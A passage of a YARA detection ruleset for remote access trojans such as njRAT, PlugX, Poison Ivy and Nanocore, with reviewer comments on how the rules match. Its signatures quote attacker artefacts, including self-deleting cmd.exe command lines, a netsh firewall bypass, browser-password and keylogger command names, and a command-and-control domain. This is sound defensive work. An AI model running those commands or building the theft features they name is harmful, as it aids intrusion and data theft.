        hash1 = "e707a7745e346c5df59b5aa4df084574ae7c204f4fb7f924c0586ae03b79bf06"

    strings:
        $x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii
        $x2 = "RunPE1" fullword ascii
        $x3 = "082B8C7D3F9105DC66A7E3267C9750CF43E9D325" fullword ascii
        $x4 = "$374e0775-e893-4e72-806c-a8d880a49ae7" fullword ascii
        $x5 = "Monitorinjection" fullword ascii

    condition:
        ( uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of them ) )
        or ( 3 of them )
}

rule Nanocore_RAT_Gen_2
{
    meta:
        description = "Detetcs the Nanocore RAT"
        author = "Florian Roth"
        score = 100
        reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
        date = "2016-04-22"
        hash1 = "755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050"

    strings:
        $x1 = "NanoCore.ClientPluginHost" fullword ascii
        $x2 = "IClientNetworkHost" fullword ascii
        $x3 = "#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe" fullword ascii

    condition:
        ( uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them )
        or ( all of them )
}

rule Nanocore_RAT_Sample_1
{
    meta:
        description = "Detetcs a certain Nanocore RAT sample"
        author = "Florian Roth"
        score = 75
        reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
        date = "2016-04-22"
        hash2 = "b7cfc7e9551b15319c068aae966f8a9ff563b522ed9b1b42d19c122778e018c8"

    strings:
        $x1 = "TbSiaEdJTf9m1uTnpjS.n9n9M7dZ7FH9JsBARgK" fullword wide
        $x2 = "1EF0D55861681D4D208EC3070B720C21D885CB35" fullword ascii
        $x3 = "popthatkitty.Resources.resources" fullword ascii

    condition:
        ( uint16(0) == 0x5a4d and filesize < 900KB and ( 1 of ($x*) ) )
        or ( all of them )
}

rule Nanocore_RAT_Sample_2
{
    meta:
        description = "Detetcs a certain Nanocore RAT sample"
        author = "Florian Roth"
        score = 75
        reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
        date = "2016-04-22"
        hash1 = "51142d1fb6c080b3b754a92e8f5826295f5da316ec72b480967cbd68432cede1"

    strings:
        $s1 = "U4tSOtmpM" fullword ascii
        $s2 = ")U71UDAU_QU_YU_aU_iU_qU_yU_" fullword wide
        $s3 = "Cy4tOtTmpMtTHVFOrR" fullword ascii

    condition:
        uint16(0) == 0x5a4d and filesize < 40KB and all of ($s*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// NetWiredRC: the mutex name alone, or one log format string together with
// one keylogger key-name token. The $str*/$klg* tokens are individually
// generic, so the mutex is the strong indicator here.
rule NetWiredRC_B : RAT
{
    meta:
        description = "NetWiredRC"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2014-12-23"
        filetype = "memory"
        version = "1.1"

    strings:
        $mutex = "LmddnIkX"

        $str1 = "%s.Identifier"
        $str2 = "%d:%I64u:%s%s;"
        $str3 = "%s%.2d-%.2d-%.4d"
        $str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
        $str5 = "%.2d/%.2d/%d %.2d:%.2d:%.2d"

        $klg1 = "[Backspace]"
        $klg2 = "[Enter]"
        $klg3 = "[Tab]"
        $klg4 = "[Arrow Left]"
        $klg5 = "[Arrow Up]"
        $klg6 = "[Arrow Right]"
        $klg7 = "[Arrow Down]"
        $klg8 = "[Home]"
        $klg9 = "[Page Up]"
        $klg10 = "[Page Down]"
        $klg11 = "[End]"
        $klg12 = "[Break]"
        $klg13 = "[Delete]"
        $klg14 = "[Insert]"
        $klg15 = "[Print Screen]"
        $klg16 = "[Scroll Lock]"
        $klg17 = "[Caps Lock]"
        $klg18 = "[Alt]"
        $klg19 = "[Esc]"
        $klg20 = "[Ctrl+%c]"

    condition:
        $mutex
        or (1 of ($str*) and 1 of ($klg*))
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
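*/
import "pe"

// njRAT (.NET): reflection/network API names, firewall and self-delete
// command lines, and the "|'|'|" UTF-16 field delimiter. The parenthesised
// first character in each regex looks like a self-match guard — presumably.
rule Njrat: RAT
{
    meta:
        description = "Njrat"
        author = "botherder https://github.com/botherder"

    strings:
        $string1 = /(F)romBase64String/
        $string2 = /(B)ase64String/
        $string3 = /(C)onnected/ wide ascii
        $string4 = /(R)eceive/
        $string5 = /(S)end/ wide ascii
        $string6 = /(D)ownloadData/ wide ascii
        $string7 = /(D)eleteSubKey/ wide ascii
        $string8 = /(g)et_MachineName/
        $string9 = /(g)et_UserName/
        $string10 = /(g)et_LastWriteTime/
        $string11 = /(G)etVolumeInformation/
        $string12 = /(O)SFullName/ wide ascii
        $string13 = /(n)etsh firewall/ wide
        $string14 = /(c)md\.exe \/k ping 0 & del/ wide
        $string15 = /(c)md\.exe \/c ping 127\.0\.0\.1 & del/ wide
        $string16 = /(c)md\.exe \/c ping 0 -n 2 & del/ wide
        $string17 = { 7C 00 27 00 7C 00 27 00 7C }   // "|'|'|" as UTF-16LE

    condition:
        // many of these names occur in benign .NET code; the threshold is what
        // makes the rule specific
        10 of them
}

rule njrat1: RAT
{
    meta:
        author = "Brian Wallace @botnet_hunter"
        author_email = "bwall@ballastsecurity.net"
        date = "2015-05-27"
        description = "Identify njRat"

    strings:
        $a1 = "netsh firewall add allowedprogram " wide
        $a2 = "SEE_MASK_NOZONECHECKS" wide
        $b1 = "[TAP]" wide
        $b2 = " & exit" wide
        $c1 = "md.exe /k ping 0 & del " wide   // deliberately without the leading "c"
        $c2 = "cmd.exe /c ping 127.0.0.1 & del" wide
        $c3 = "cmd.exe /c ping" wide

    condition:
        1 of ($a*) and 1 of ($b*) and 1 of ($c*)
}

rule win_exe_njRAT
{
    meta:
        author = "info@fidelissecurity.com"
        descripion = "njRAT - Remote Access Trojan"
        comment = "Variants have also been observed obfuscated with .NET Reactor"
        filetype = "pe"
        date = "2013-07-15"
        version = "1.0"
        hash1 = "92ee1fb5df21d8cfafa2b02b6a25bd3b"
        hash2 = "3576d40ce18bb0349f9dfa42b8911c3a"
        hash3 = "24cc5b811a7f9591e7f2cb9a818be104"
        hash4 = "3ad5fded9d7fdf1c2f6102f4874b2d52"
        hash5 = "a98b4c99f64315aac9dd992593830f35"
        hash6 = "5fcb5282da1a2a0f053051c8da1686ef"
        hash7 = "a669c0da6309a930af16381b18ba2f9d"
        hash8 = "79dce17498e1997264346b162b09bde8"
        hash9 = "fc96a7e27b1d3dab715b2732d5c86f80"
        ref1 = "http://bit.ly/19tlf4s"
        ref2 = "http://www.fidelissecurity.com/threatadvisory"
        ref3 = "http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njratuncovered.html"
        ref4 = "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf"

    strings:
        $magic = "MZ"

        // set A: .NET API names — individually common, required as a whole
        $string_setA_1 = "FromBase64String"
        $string_setA_2 = "Base64String"
        $string_setA_3 = "Connected" wide ascii
        $string_setA_4 = "Receive"
        $string_setA_5 = "DeleteSubKey" wide ascii
        $string_setA_6 = "get_MachineName"
        $string_setA_7 = "get_UserName"
        $string_setA_8 = "get_LastWriteTime"
        $string_setA_9 = "GetVolumeInformation"

        // set B: API names plus the firewall/self-delete command lines
        $string_setB_1 = "OSFullName" wide ascii
        $string_setB_2 = "Send" wide ascii
        $string_setB_3 = "Connected" wide ascii
        $string_setB_4 = "DownloadData" wide ascii
        $string_setB_5 = "netsh firewall" wide
        $string_setB_6 = "cmd.exe /k ping 0 & del" wide

    condition:
        ($magic at 0)
        and ( all of ($string_setA*) or all of ($string_setB*) )
}

// Network-side rule (PCAP): njRAT command tokens with the "|'|'|" delimiter,
// or more than four idle-connection "P[endof]" frames.
rule network_traffic_njRAT
{
    meta:
        author = "info@fidelissecurity.com"
        descripion = "njRAT - Remote Access Trojan"
        comment = "Rule to alert on network traffic indicators"
        filetype = "PCAP - Network Traffic"
        date = "2013-07-15"
        version = "1.0"
        hash1 = "92ee1fb5df21d8cfafa2b02b6a25bd3b"
        hash2 = "3576d40ce18bb0349f9dfa42b8911c3a"
        hash3 = "24cc5b811a7f9591e7f2cb9a818be104"
        hash4 = "3ad5fded9d7fdf1c2f6102f4874b2d52"
        hash5 = "a98b4c99f64315aac9dd992593830f35"
        hash6 = "5fcb5282da1a2a0f053051c8da1686ef"
        hash7 = "a669c0da6309a930af16381b18ba2f9d"
        hash8 = "79dce17498e1997264346b162b09bde8"
        hash9 = "fc96a7e27b1d3dab715b2732d5c86f80"
        ref1 = "http://bit.ly/19tlf4s"
        ref2 = "http://www.fidelissecurity.com/threatadvisory"
        ref3 = "http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html"
        ref4 = "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf"

    strings:
        $string1 = "FM|'|'|"            // File Manager
        $string2 = "nd|'|'|"            // File Manager
        $string3 = "rn|'|'|"            // Run File
        $string4 = "sc~|'|'|"           // Remote Desktop
        $string5 = "scPK|'|'|"          // Remote Desktop
        $string6 = "CAM|'|'|"           // Remote Cam
        $string7 = "USB Video Device[endof]"   // Remote Cam
        $string8 = "rs|'|'|"            // Reverse Shell
        $string9 = "proc|'|'|"          // Process Manager
        $string10 = "k|'|'|"            // Process Manager
        $string11 = "RG|'|'|~|'|'|"     // Registry Manipulation
        $string12 = "kl|'|'|"           // Keylogger file
        $string13 = "ret|'|'|"          // Get Browser Passwords
        $string14 = "pl|'|'|"           // Get Browser Passwords
        $string15 = "lv|'|'|"           // General
        $string16 = "prof|'|'|~|'|'|"   // Server rename
        $string17 = "un|'|'|~[endof]"   // Uninstall
        $idle_string = "P[endof]"       // Idle Connection

    condition:
        any of ($string*) or #idle_string > 4
}

// Orcus RAT: namespace / assembly / build-path fragments and HVNC and
// keylogger command names; 13 of 33 required.
rule RAT_Orcus
{
    meta:
        author = " J from THL <j@techhelplist.com> with thx to MalwareHunterTeam"
        date = "2017/01"
        reference = "https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/"
        version = 1
        maltype = "RAT"
        filetype = "memory"

    strings:
        $text01 = "Orcus.CommandManagement"
        $text02 = "Orcus.Commands."
        $text03 = "Orcus.Config."
        $text04 = "Orcus.Connection."
        $text05 = "Orcus.Core."
        $text06 = "Orcus.exe"
        $text07 = "Orcus.Extensions."
        $text08 = "Orcus.InstallationPromptForm"
        $text09 = "Orcus.MainForm."
        $text10 = "Orcus.Native."
        $text11 = "Orcus.Plugins."
        $text12 = "orcus.plugins.dll"
        $text13 = "Orcus.Properties."
        $text14 = "Orcus.Protection."
        $text15 = "Orcus.Share."
        $text16 = "Orcus.Shared"
        $text17 = "Orcus.StaticCommands"
        $text18 = "Orcus.Utilities."
        $text19 = "\\Projects\\Orcus\\Source\\Orcus."
        $text20 = ".orcus.plugins.dll.zip"
        $text21 = ".orcus.shared.dll.zip"
        $text22 = ".orcus.shared.utilities.dll.zip"
        $text23 = ".orcus.staticcommands.dll.zip"
        $text24 = "HvncCommunication"
        $text25 = "HvncAction"
        $text26 = "hvncDesktop"
        $text27 = ".InstallationPromptForm"
        $text28 = "RequestKeyLogCommand"
        $text29 = "get_KeyLogFile"
        $text30 = "LiveKeyloggerCommand"
        $text31 = "ORCUS.STATICCOMMANDS, VERSION="
        $text32 = "PrepareOrcusFileToRemove"
        $text33 = "ConvertFromOrcusValueKind"

    condition:
        13 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// PlugX: loader file name, or the "d:\work" build path with a version tag.
rule PlugXStrings : PlugX Family
{
    meta:
        description = "PlugX Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-12"

    strings:
        $BootLDR = "boot.ldr" wide ascii
        $Dwork = "d:\\work" nocase
        $Plug25 = "plug2.5"
        $Plug30 = "Plug3.0"
        $Shell6 = "Shell6"

    condition:
        $BootLDR or ($Dwork and ($Plug25 or $Plug30 or $Shell6))
}

// PlugX v1/v2 memory artifacts: "GULP" config header, update URL format,
// immediate-operand code fragments and the v2 key constant.
rule plugX : rat
{
    meta:
        author = "Jean-Philippe Teissier / @Jipe_"
        description = "PlugX RAT"
        date = "2014-05-13"
        filetype = "memory"
        version = "1.0"
        ref1 = "https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py"

    strings:
        $v1a = { 47 55 4C 50 00 00 00 00 }   // "GULP\0\0\0\0"
        $v1b = "/update?id=%8.8x"
        $v1algoa = { BB 33 33 33 33 2B }     // mov ebx, 0x33333333 ; sub ... (likely)
        $v1algob = { BB 44 44 44 44 2B }     // mov ebx, 0x44444444 ; sub ... (likely)
        $v2a = "Proxy-Auth:"
        $v2b = { 68 A0 02 00 00 }            // push 0x2A0
        $v2k = { C1 8F 3A 71 }

    condition:
        $v1a at 0
        or $v1b
        or (($v2a or $v2b) and (($v1algoa and $v1algob) or $v2k))
}

// Event-log rule (Security log 4688 process creation): PlugX launched from a
// numeric directory under %APPDATA%, rundll32.exe and iexplore.exe.
rule PlugX_mw
{
    meta:
        maltype = "plugX"
        author = "https://github.com/reed1713"
        reference = "http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html"
        description = "Malware creates a randomized directory within the appdata roaming directory and launches the malware. Should see multiple events for create process rundll32.exe and iexplorer.exe as it repeatedly uses iexplorer to launch the rundll32 process."

    strings:
        $type = "Microsoft-Windows-Security-Auditing"
        $eventid = "4688"
        // The original regex had "\VMwareCplLauncher" with a single backslash;
        // YARA treats "\V" as a literal "V", so the path separator between the
        // numeric directory and the executable was missing and the pattern
        // could not match the described path. "\\" is the escaped backslash.
        $data = /\\AppData\\Roaming\\[0-9]{9,12}\\VMwareCplLauncher\.exe/

        $type1 = "Microsoft-Windows-Security-Auditing"
        $eventid1 = "4688"
        $data1 = "\\Windows\\System32\\rundll32.exe"

        $type2 = "Microsoft-Windows-Security-Auditing"
        $eventid2 = "4688"
        $data2 = "Program Files\\Internet Explorer\\iexplore.exe"

    condition:
        // all three process-creation records must be in the same scanned log
        all of them
}

// PoetRAT dropper document: embedded Python script names plus generic
// cmd/.exe/.dll markers; every string is required.
rule PoetRat_Doc
{
    meta:
        Author = "Nishan Maharjan"
        Description = "A yara rule to catch PoetRat Word Document"
        // NOTE(review): key is "Data" in the original; probably meant "Date"
        Data = "6th May 2020"

    strings:
        // "$" anchors to end of data in YARA, so the .py/.pyc/.pyd branches only
        // match at the very end; the "Python" branch carries this string in practice
        $pythonRegEx = /(\.py$|\.pyc$|\.pyd$|Python)/   // checking for python strings

        // Python file strings in the word documents
        $pythonFile1 = "launcher.py"
        $zipFile = "smile.zip"
        $pythonFile2 = "smile_funs.py"
        $pythonFile3 = "frown.py"
        $pythonFile4 = "backer.py"
        $pythonFile5 = "smile.py"
        $pythonFile6 = "affine.py"

        // dlls and cmd strings
        $dlls = /\.dll/
        $cmd = "cmd"
        $exe = ".exe"

    condition:
        all of them
}

// PoetRAT Python components: strings shared across the several scripts.
rule PoetRat_Python
{
    meta:
        Author = "Nishan Maharjan"
        Description = "A yara rule to catch PoetRat python scripts"
        // NOTE(review): key is "Data" in the original; probably meant "Date"
        Data = "6th May 2020"

    strings:
        // Any of the strings that stand out in the files, these are for the multiple python files, not just for a single file
        $encrptionFunction = "Affine"
        // short alternatives such as "ls", "cd", "cp", "mv" match almost any text,
        // so this string contributes little to the "3 of them" threshold
        $commands = /version|ls|cd|sysinfo|download|upload|shot|cp|mv|link|register|hid|compress|jobs|exit|tasklist|taskkill/
        $domain = "dellgenius.hopto.org"
        // The original ended in a trailing "|", i.e. an empty alternative that
        // matches at every offset (or is rejected outright, depending on the
        // YARA version), which would satisfy this string on any input.
        $grammer_massacre = /BADD|Bad Error Happened/
        $mayBePresent = /self\.DIE|THE_GUID_KEY/
        $pipe_out = "Abibliophobia23"
        $shot = "shot_{0}_{1}.png"

    condition:
        3 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.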
*/

import "pe"

// Poison Ivy install marker as a hex string: "StubPath", one wildcard byte,
// "SOFTWARE\Classes\http\shell\open\command", a 22-byte gap, then
// "Software\Microsoft\Active Setup\Installed Components\".
rule poisonivy_1 : rat {
    meta:
        description = "Poison Ivy"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-02-01"
        filetype = "memory"
        version = "1.0"
        ref1 = "https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py"
    strings:
        $a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C }
    condition:
        $a
}

// PE-only (MZ magic, < 500KB). Three independent ways to fire: the $k1 password
// marker alone, all $s* imports/strings, or all $h* HTTP command paths.
// $s8 and $h3 are the same literal ("login.asp").
rule PoisonIvy_Generic_3 {
    meta:
        description = "PoisonIvy RAT Generic Rule"
        author = "Florian Roth"
        date = "2015-05-14"
        hash = "e1cbdf740785f97c93a0a7a01ef2614be792afcd"
    strings:
        $k1 = "Tiger324{" fullword ascii
        $s2 = "WININET.dll" fullword ascii
        $s3 = "mscoree.dll" fullword wide
        $s4 = "WS2_32.dll" fullword
        $s5 = "Explorer.exe" fullword wide
        $s6 = "USER32.DLL"
        $s7 = "CONOUT$"
        $s8 = "login.asp"
        $h1 = "HTTP/1.0"
        $h2 = "POST"
        $h3 = "login.asp"
        $h4 = "check.asp"
        $h5 = "result.asp"
        $h6 = "upload.asp"
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and ( $k1 or all of ($s*) or all of ($h*) )
}

// Note on the condition: "and" binds tighter than "or", so this parses as
// ($stub at 0x1620 and all of ($string*)) or (all of them). Because "$stub at
// 0x1620" implies "$stub", the whole expression is equivalent to "all of them";
// the offset check never narrows the match. Kept as written.
rule PoisonIvy_2 {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/PoisonIvy"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $stub = {04 08 00 53 74 75 62 50 61 74 68 18 04}   // ..."StubPath"..
        $string1 = "CONNECT %s:%i HTTP/1.0"
        $string2 = "ws2_32"
        $string3 = "cks=u"
        $string4 = "thj@h"
        $string5 = "advpack"
    condition:
        $stub at 0x1620 and all of ($string*) or (all of them)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// The following rules (Kevin Breen, malwareconfig.com) are all "all of them"
// string sets, so a single missing string suppresses the match.

rule AAR : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/AAR"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "Hashtable"
        $b = "get_IsDisposed"
        $c = "TripleDES"
        $d = "testmemory.FRMMain.resources"
        $e = "$this.Icon" wide
        $f = "{11111-22222-20001-00001}" wide
        $g = "@@@@@"
    condition:
        all of them
}

rule Ap0calypse: RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Ap0calypse"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "Ap0calypse"
        $b = "Sifre"
        $c = "MsgGoster"
        $d = "Baslik"
        $e = "Dosyalars"
        $f = "Injecsiyon"
    condition:
        all of them
}

rule Arcom : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Arcom"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a1 = "CVu3388fnek3W(3ij3fkp0930di"
        $a2 = "ZINGAWI2"
        $a3 = "clWebLightGoldenrodYellow"
        $a4 = "Ancestor for '%s' not found" wide
        $a5 = "Control-C hit" wide
        $a6 = {A3 24 25 21}
    condition:
        all of them
}

rule Bandook : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/bandook"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "aaaaaa1|"
        $b = "aaaaaa2|"
        $c = "aaaaaa3|"
        $d = "aaaaaa4|"
        $e = "aaaaaa5|"
        $f = "%s%d.exe"
        $g = "astalavista"
        $h = "givemecache"
        $i = "%s\\system32\\drivers\\blogs\\*"
        $j = "bndk13me"
    condition:
        all of them
}

rule BlackNix : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/BlackNix"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a1 = "SETTINGS" wide
        $a2 = "Mark Adler"
        $a3 = "Random-Number-Here"
        $a4 = "RemoteShell"
        $a5 = "SystemInfo"
    condition:
        all of them
}

rule BlueBanana : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/BlueBanana"
        maltype
= "Remote Access Trojan"
        filetype = "Java"
    strings:
        $meta = "META-INF"
        $conf = "config.txt"
        $a = "a/a/a/a/f.class"
        $b = "a/a/a/a/l.class"
        $c = "a/a/a/b/q.class"
        $d = "a/a/a/b/v.class"
    condition:
        all of them
}

// $conf is nine zero bytes followed by 0x7E; such low-entropy patterns are slow
// to scan and occur in many files, so it adds little beyond the text strings.
rule ClientMesh : RAT {
    meta:
        author = "Kevin Breen <kevin@techanarchy.net>"
        date = "2014/06"
        ref = "http://malwareconfig.com/stats/ClientMesh"
        family = "torct"
    strings:
        $string1 = "machinedetails"
        $string2 = "MySettings"
        $string3 = "sendftppasswords"
        $string4 = "sendbrowserpasswords"
        $string5 = "arma2keyMass"
        $string6 = "keylogger"
        $conf = {00 00 00 00 00 00 00 00 00 7E}
    condition:
        all of them
}

rule DarkRAT : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/DarkRAT"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "@1906dark1996coder@"
        $b = "SHEmptyRecycleBinA"
        $c = "mciSendStringA"
        $d = "add_Shutdown"
        $e = "get_SaveMySettingsOnExit"
        $f = "get_SpecialDirectories"
        $g = "Client.My"
    condition:
        all of them
}

// $a / $b are the "####@####" delimiter (0x23 0x40) around a few high bytes.
rule Greame : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Greame"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
        $b = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
        $c = "EditSvr"
        $d = "TLoader"
        $e = "Stroks"
        $f = "Avenger by NhT"
        $g = "####@####"
        $h = "GREAME"
    condition:
        all of them
}

rule HawkEye : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2015/06"
        ref = "http://malwareconfig.com/stats/HawkEye"
        maltype = "KeyLogger"
        filetype = "exe"
    strings:
        $key = "HawkEyeKeylogger" wide
        $salt = "099u787978786" wide
        $string1 = "HawkEye_Keylogger" wide
        $string2 = "holdermail.txt" wide
        $string3 = "wallet.dat" wide
        $string4 = "Keylog Records" wide
        $string5 = "<!-- do not script -->" wide
        $string6 = "\\pidloc.txt" wide
        $string7 = "BSPLIT" wide
    condition:
        $key and $salt and all of ($string*)
}
// Two generations of Imminent Monitor, matched as two independent "all of" sets.
// This rule is string-for-string identical to rule xRAT later in this file, so
// any sample that hits one hits both.
rule Imminent : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Imminent"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $v1a = "DecodeProductKey"
        $v1b = "StartHTTPFlood"
        $v1c = "CodeKey"
        $v1d = "MESSAGEBOX"
        $v1e = "GetFilezillaPasswords"
        $v1f = "DataIn"
        $v1g = "UDPzSockets"
        $v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}   // "RT_RCDATA" as UTF-16LE
        $v2a = "<URL>k__BackingField"
        $v2b = "<RunHidden>k__BackingField"
        $v2c = "DownloadAndExecute"
        $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide
        $v2e = "england.png" wide
        $v2f = "Showed Messagebox" wide
    condition:
        all of ($v1*) or all of ($v2*)
}

rule Infinity : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Infinity"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "CRYPTPROTECT_PROMPTSTRUCT"
        $b = "discomouse"
        $c = "GetDeepInfo"
        $d = "AES_Encrypt"
        $e = "StartUDPFlood"
        $f = "BATScripting" wide
        $g = "FBqINhRdpgnqATxJ.html" wide
        $i = "magic_key" wide
    condition:
        all of them
}

// JAR dropper: the manifest path must be present plus one complete
// $a / $b / $c / $d group.
rule JavaDropper : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2015/10"
        ref = "http://malwareconfig.com/stats/AlienSpy"
        maltype = "Remote Access Trojan"
        filetype = "jar"
    strings:
        $jar = "META-INF/MANIFEST.MF"
        $a1 = "ePK"
        $a2 = "kPK"
        $b1 = "config.ini"
        $b2 = "password.ini"
        $c1 = "stub/stub.dll"
        $d1 = "c.dat"
    condition:
        $jar and (all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*))
}

// $a0 is "\r\n*EDIT_SERVER*\r\n" as raw bytes.
rule LostDoor : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/LostDoor"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a0 = {0D 0A 2A 45 44 49 54 5F 53 45 52 56 45 52 2A 0D 0A}
        $a1 = "*mlt* = %"
        $a2 = "*ip* = %"
        $a3 = "*victimo* = %"
        $a4 = "*name* = %"
        $b5 = "[START]"
        $b6 = "[DATA]"
        $b7 = "We Control Your Digital World" wide ascii
        $b8 = "RC4Initialize" wide ascii
        $b9 = "RC4Decrypt" wide ascii
    condition:
        all of ($a*) or
all of ($b*)
}

rule LuminosityLink : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/LuminosityLink"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "SMARTLOGS" wide
        $b = "RUNPE" wide
        $c = "b.Resources" wide
        $d = "CLIENTINFO*" wide
        $e = "Invalid Webcam Driver Download URL, or Failed to Download File!" wide
        $f = "Proactive Anti-Malware has been manually activated!" wide
        $g = "REMOVEGUARD" wide
        $h = "C0n1f8" wide
        $i = "Luminosity" wide
        $j = "LuminosityCryptoMiner" wide
        $k = "MANAGER*CLIENTDETAILS*" wide
    condition:
        all of them
}

// $a-$d are ordinary .NET metadata names; $e and $f do the real work here.
rule LuxNet : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/LuxNet"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "GetHashCode"
        $b = "Activator"
        $c = "WebClient"
        $d = "op_Equality"
        $e = "dickcursor.cur" wide
        $f = "{0}|{1}|{2}" wide
    condition:
        all of them
}

rule NanoCore : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/NanoCore"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "NanoCore"
        $b = "ClientPlugin"
        $c = "ProjectData"
        $d = "DESCrypto"
        $e = "KeepAlive"
        $f = "IPNETROW"
        $g = "LogClientMessage"
        $h = "|ClientHost"
        $i = "get_Connected"
        $j = "#=q"
        $key = {43 6f 24 cb 95 30 38 39}
    condition:
        6 of them
}

rule Paradox : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Paradox"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "ParadoxRAT"
        $b = "Form1"
        $c = "StartRMCam"
        $d = "Flooders"
        $e = "SlowLaris"
        $f = "SHITEMID"
        $g = "set_Remote_Chat"
    condition:
        all of them
}

rule Plasma : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Plasma"
        maltype = "Remote Access Trojan"
        filetype = "exe"
